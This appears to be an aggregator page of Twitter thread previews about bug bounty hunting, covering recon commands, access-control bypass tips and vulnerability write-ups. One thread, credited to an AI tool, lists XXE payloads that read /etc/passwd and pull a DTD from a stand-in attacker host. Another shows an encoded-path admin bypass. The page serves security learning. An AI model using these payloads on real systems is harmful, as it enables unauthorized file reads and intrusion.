Discover and read the best of Twitter Threads about #BugBounty

Most recent (24)

FREE Cybersecurity Certification in 2023:
Breaking into cybersecurity

#Infosec Thread
👇
Cybersecurity is a rapidly growing field, and the demand for qualified professionals is high. A cybersecurity certificate can help you gain the skills and knowledge you need to start a career in this in-demand field.
Here are some of the benefits of getting a cybersecurity certificate:

1. Increased job opportunities
2. Higher salaries
3. More job security
4. Personal satisfaction
5. Addition To Your Knowledge
Read 12 tweets
Some of the major vulnerabilities and related POCs:

➡SQLi
➡XSS
➡SSRF
➡XXE
➡Path Traversal
➡Open Redirection
➡Account Takeover
➡Remote code execution
➡IDOR
➡CSRF

#hacking #bugbounty #bugbountytips

Are Found Below🧵(1/n)👇
Read 13 tweets
😉You would love to grab these for yourselves, wouldn't you... 🕶️but hold on, they are currently in the hands of inquisitive #hardwarehackers, making these hardware devices ready for future threats

⌚️Teardown has begun at #HardPwn🛩️

#hw_ioUSA2023
Read 4 tweets
Nuclei + AI = Money 🤑

Here's how to use AI and nuclei to make money while you sleep 👇🧵
#bugbountytips #bugbounty
1. Run nuclei

First of all, if you can use a server or any kind of droplet (for Axiom, Hakq or Nuclei Cloud) that would be great!

Use them and run nuclei on a large number of subdomains.
See the final command in the next tweet 👇
2. Nuclei config

- max number of templates to be executed in parallel (-c)
- number of hosts to be analyzed in parallel per template (-bs)
- rate limit number (-rl)

Final command:
"nuclei -o output.txt -bs <> -c <> -rl <>"

Learn more about @pdnuclei 👇
nuclei.projectdiscovery.io/nuclei/get-sta…
Read 6 tweets
How we, @vidocsecurity, bypass 401 and 403 - practical tips for fellow #bugbounty hunters <thread>
Try fuzzing HTTP methods/user agents; you would be surprised how many times simply changing the User-Agent to e.g. a mobile-specific client worked.
Play with forward/referer-type headers and their values. Try different variants, and fuzz common custom headers that follow the pattern with different formats of localhost/custom IP address.
Read 7 tweets
Wondering what happened this week in #BugBounty and pentesting? Procrastinating on twitter and want to pretend to be productive? Let's check out this week's #BugBytes
PS: did you notice that the write-ups and tutorials are now separated? If you're looking for more advanced security research or to grow your skills!
1⃣@NahamSec talks about 2 months of bug hunting, the luck, approach and choosing a program and also burnout
Read 12 tweets
🧵NEW THREAD🧵
Here is how I was able to take over the whole company's AWS infrastructure in under 10 min after a new asset launch at a @Hacker0x01 private program
1. I was invited in the morning to a private program at H1 and the program updated the scope in the evening, so I decided to take a look to see if there was something to hack
2. I visited the main website in scope, to my surprise and thanks to @trufflesec's Chrome extension Trufflehog, which can be found here: chrome.google.com/webstore/detai…
Read 11 tweets
🧵NEW Thread🧵

Here is how I found the easiest SQLi and possible RCE in less than 30 min of recon and dorking

1. I was invited to a private program at @Hacker0x01 and the first thing I usually do is to look at the scope and see if it is a wildcard domain or just a small scope.
2. Found that the program accepts all vulnerabilities related to their assets and of course third-party assets are OOS
3. I used the @leak_ix search engine at leakix.net and used this dork [+target_name ++plugin:"GitConfigHttpPlugin"]
Note: this is used to search for already scanned websites that have /.git exposed
Read 13 tweets
ProjectDiscovery Recon Series 🔥

Your daily Sunday reading is brought to you by @pdiscoveryio with its Recon 101 Series.🧵👇

#Recon #AttackSurface #bugbounty #recontips #projectdiscovery
1 - Active and Passive Recon

Master both techniques to uncover target info stealthily.

blog.projectdiscovery.io/reconnaissance…
2 - Subdomain Enumeration

Unveil hidden web assets.

blog.projectdiscovery.io/recon-series-2/
Read 6 tweets
A lesser-known yet effective way of #bugbounty hunting is called "hacktivity" hunting. It involves bypassing fixes on disclosed reports found on @Hacker0x01's hacktivity page. This approach helped me score a $5k bounty! Here's how it works.👇

#InfoSec #CyberSecurity
With hacktivity hunting, the hard part - finding interesting behavior or insecure features - is already done for you. Your main role is to find a bypass.

For example, I found a bypass for a report on hackerone.com/reports/949643

#BugBountyTips
The original report tried to restrict access to /admin by restricting the path in Nginx. However, I bypassed it using simple encoding - /%2561dmin. Endpoints required authentication, but I bypassed this by adding ".json" at the end.

#BugBounty #Hacking
Read 8 tweets
Want to improve your network scanning skills with Nmap? 🕵️‍♀️💻

Check out these 5 quick tips to define targets, speed up scans, and scan with specific script categories! 🧵👇

#recon #recontips #AttackSurface #bugbounty #recontools #cybersecurity
1/5 Let's start with how to define targets.

Define targets for nmap scan by specifying IP addresses, IP ranges, domain names, or using a target list file.

$ nmap <IP1> <IP2> …
$ nmap 192.168.0.1/24
$ nmap <domain name>
$ nmap -iL <target list file>
2/5 The Ippsec scan for basic coverage.

Perform a comprehensive network scan using nmap's Ippsec initial scan.

$ nmap 127.0.0.1 -sC -sV -oA initial_nmap_scan
Read 7 tweets
Two-factor authentication bypass: ⚔️

- In the application's registration, it required a mobile number for compulsory two-factor authentication.
- Captured the request for mobile number addition
POST /mobile/add

{XXNUMBERXX}
(1/n)

- Now followed the registration normally by adding a mobile number.
- Now when I logged in to the account it required an OTP to proceed.
- Used an invalid OTP like 111111 and intercepted the request.
- Changed the request PATH and BODY to earlier captured request.
(2/n)

- They were implementing checks for all internal API endpoints before entering the OTP but forgot to add a check for the mobile number addition request.
- I was able to add a new number without entering the OTP
- This led to 2FA bypass.

#infosec #cybersec #bugbounty
Read 3 tweets
😱 I asked ChatGPT "What are some of the unpopular SQL injection areas" and this is what it replied.

🧵👇

#bugbounty #cybersecurity #infosec #sqli
1. Error messages: Sometimes error messages can reveal important information about the application's database, such as table names or column names. An attacker can use this information to craft a SQL injection attack.
2. Search fields: Search fields are often overlooked when testing for SQL injection vulnerabilities, but they can be an easy target for attackers. In un-sanitized search queries, an attacker can inject SQL code to retrieve sensitive data from the database.
Read 7 tweets
40 Best PenTesting Toolkits

Information Gathering

•OSINT Framework
•Nmap
•Whois
•Recon-ng
•Wireshark
•Dnsrecon
•Google Hacking Database
•Nikto
•Dnsenum
Scanning and Enumeration

•Nmap
•Nikto
•PowerShell Scripts
•OpenVAS
•Nessus
•Sqlninja
•OWASP ZAP
•WPScan
Exploitation

•Metasploit
•Sqlmap
•MITRE ATT&CK
•Burp Suite
•Hydra
•Netcat
•Routersploit
•Cain and Abel
•John the Ripper
•Hashcat
Read 7 tweets
☃️Bug Bounty Beginner's Roadmap☃️

Many of you have asked me how to get started with bug bounty and what the prerequisites are to get started.

This repository contains nearly everything you need to know and can help you get started easily with a variety of resources.

#bugbounty
@techhacker98 That's a wrap!

If you enjoyed this thread:

1. Follow me @thebinarybot to get quality content on cybersecurity and bug bounty hunting.
2. RT the tweet below to share this thread with your audience
Read 4 tweets
The team at @OpenAI just fixed a critical account takeover vulnerability I reported a few hours ago affecting #ChatGPT.

It was possible to take over someone's account, view their chat history, and access their billing information without them ever realizing it.

Breakdown below 👇
@OpenAI The vulnerability was "Web Cache Deception" and I'll explain in detail how I managed to bypass the protections in place on chat.openai.com.

It's important to note that the issue is fixed, and I received a "Kudos" email from @OpenAI's team for my responsible disclosure.
While exploring the requests that handle ChatGPT's authentication flow I was looking for any anomaly that might expose user information.

The following GET request caught my attention:

https://chat.openai[.]com/api/auth/session
Read 19 tweets
A few months ago @osiryszzz and I discovered an interesting case of SQL injection on a @SynackRedTeam target, which was black-box testing.

During recon we noticed that there was an unrestricted file upload mechanism available to any user. #bugbounty #bugbountytips /1
We noticed that the target was only processing ZIP files, but where the content was unzipped wasn't clear, which was preventing potential RCE or file overwrite via ZIP bombing. /2
However, it appeared that each file entry inside the ZIP file was added to the database after unpacking, so we wanted to see if it was possible to achieve SQL injection simply by making a file name with a SQL injection payload. /3
Read 6 tweets
From Noob to Pentesting Clients in 2023 👇
1. Be laser focused to become l33t. Cybersecurity is a large field and you can't be an expert of everything.
2. Let's say you choose application security. Here's how I would skill up really fast.
Read 9 tweets
HTTP Parameter Pollution @SecGPT has seen in its training.
1. ATO via password reset

The attacker manipulates the HTTP parameters of the password reset page to change the email address associated with the account, then uses the password reset link => ATO.
2. Price manipulation in e-commerce platforms

The attacker manipulates the HTTP parameters of an e-commerce website to change the price of a product. The attacker can then purchase the product at a lower price than intended.
Read 5 tweets
🚀🔒Exciting news! SecGPT is now LIVE!

Trained on thousands of cybersecurity reports, SecGPT revolutionizes cybersecurity with AI-driven insights.👇
1. Trained on an extensive collection of cybersecurity reports, @SecGPT provides you with a deeper understanding of vulnerabilities, exploitation techniques, and emerging trends in cybersecurity.

Its knowledge increases as more reports and writeups are published.
2. Explore SecGPT's capabilities and see how it can assist you in enhancing your cybersecurity expertise.

Try it out for free at alterai.me

#ai #cybersecurity #infosec #pentesting #ethicalhacking #bugbounty #bugbountytips #secgpt
Read 7 tweets
Boost your pentesting and bug bounty game with SecGPT's AI insights from thousands of online security reports.

I've asked it for some XXE payloads found in the reports.
1. Basic XXE payload

`<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
2. Blind XXE payload

`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo></foo>`
Read 7 tweets
Unlocking the Secrets: Breaking Access Controls, the basics 👇

(from the AI model I'm currently training on security reports)
1. Direct object reference

This occurs when an attacker is able to access a resource directly by manipulating a parameter in the URL or form data.
2. Horizontal privilege escalation

This occurs when an attacker is able to access resources or perform actions that are intended for another user with the same level of access.
Read 8 tweets
Oftentimes, to simplify my work, I build scripts.👇

I recently discovered katana by @pdiscoveryio. And I turned this:

katana -d 5 -c 50 -p 20 -ef "ttf,woff,svg,jpeg,jpg,png,ico,gif,css" -u <https://tld> -cs "regex-to-restrict-to-tld-and-subdomains"

into this:

kata <tld>
1. The long command does the following:

-d => depth 5
-c => concurrency 50
-p => threads in parallel 20
-ef => exclude these
-u => supply the top level domain (i.e. twitter.com)
-cs => scope for this regex (limited to the tld and its subdomains)
2. You can download the kata bash script from my repo below. Use it as:

kata <tld>

Do me a favor and star the repo, thanks!

#pentesting #infosec #cybersecurity #ethicalhacking #bugbounty #bugbountytips

github.com/CristiVlad25/s…
Read 3 tweets